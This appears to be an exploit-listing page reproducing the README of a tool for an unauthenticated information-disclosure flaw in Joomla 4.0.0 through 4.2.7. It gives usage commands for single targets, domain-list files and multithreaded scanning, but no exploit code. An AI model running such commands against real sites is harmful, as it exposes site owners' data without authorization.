Share
## https://sploitus.com/exploit?id=ED09B2EE-07B3-547B-93CC-D9DAC465C0D2
# joomla-exploits ๐ธ
## Title: Joomla! < 4.2.8 - Unauthenticated information disclosure
## Exploit author: HACKFUT
## Date: 2024-01-24
## Vendor Homepage: https://www.joomla.org/
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)
# Mode simple
python3 exploit.py http://example.com
# Mode fichier
python3 exploit.py -f domains.txt
# Mode fichier avec 10 threads
python3 exploit.py -f domains.txt -t 10
# Mode debug
python3 exploit.py http://example.com --debug